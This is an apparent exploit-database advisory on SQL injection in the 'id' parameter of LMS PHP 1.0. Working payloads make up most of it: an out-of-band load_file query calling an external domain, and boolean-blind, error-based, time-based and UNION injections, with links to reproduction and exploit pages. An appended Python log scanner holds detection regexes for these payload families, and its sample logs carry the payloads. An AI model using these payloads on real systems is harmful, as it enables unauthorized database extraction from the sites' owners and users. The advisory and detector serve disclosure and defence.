# LMS PHP 1.0 SQL Injection

LMS PHP version 1.0 suffers from a remote SQL injection vulnerability.
## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi

## Author: nu11secur1ty

## Date: 03/28/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400

## Reference: https://portswigger.net/web-security/sql-injection

## Description:

The `id` parameter appears to be vulnerable to SQL injection attacks. The payload

```
'+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
```

was submitted in the `id` parameter. This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Using this vulnerability, an attacker can extract all information from the system.

STATUS: HIGH - Vulnerability

[+] Payload:

```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
---
```
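As an added detection example (not part of the advisory), the following Python scans Apache-style access log lines for the `id` parameter of the `manage_user` page and flags values that are not a plain integer, classifying them by the payload families listed above (boolean-based RLIKE, error-based FLOOR/RAND, time-based SLEEP, UNION, and `load_file`). The log lines and the `/lms/admin/` path prefix are constructed for the example; the application's real path is not given on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signature classes derived from the payload types in the advisory above.
SIGNATURES = {
    "boolean-based": re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b", re.I),
    "error-based": re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "oob-file": re.compile(r"\bload_file\s*\(", re.I),
}

# Combined/common log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: one benign request, then two requests carrying the
# time-based and UNION payloads from the advisory, URL-encoded as a server would log them.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2024:10:01:02 +0000] "GET /lms/admin/?page=user/manage_user&id=7 HTTP/1.1" 200 5120
203.0.113.5 - - [28/Mar/2024:10:01:09 +0000] "GET /lms/admin/?page=user/manage_user&id=7%27%27%27%20AND%20(SELECT%206760%20FROM%20(SELECT(SLEEP(7)))iMBe)%20AND%20%27xzwU%27=%27xzwU HTTP/1.1" 200 5120
203.0.113.5 - - [28/Mar/2024:10:01:15 +0000] "GET /lms/admin/?page=user/manage_user&id=-2854%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x41,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 6301
"""


def scan_line(line):
    """Return (client_ip, decoded id value, [signature classes]) when the id
    parameter is not a plain integer, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    for value in parse_qs(query).get("id", []):  # parse_qs percent-decodes for us
        if value.lstrip("-").isdigit():  # an integer id is all the page expects
            continue
        kinds = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        return (m.group("ip"), value, kinds or ["non-numeric id"])
    return None


def scan_log(text):
    """Scan a whole log and return the list of suspicious id requests."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, value, kinds in scan_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(kinds)} -> id={value!r}")
```

The signature list is a starting point, not a complete filter: the non-numeric check is what actually catches variants, since the application should never receive anything but an integer in `id`.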
## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0)

## Proof and Exploit:

[href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html)

## Time spent:

01:15:00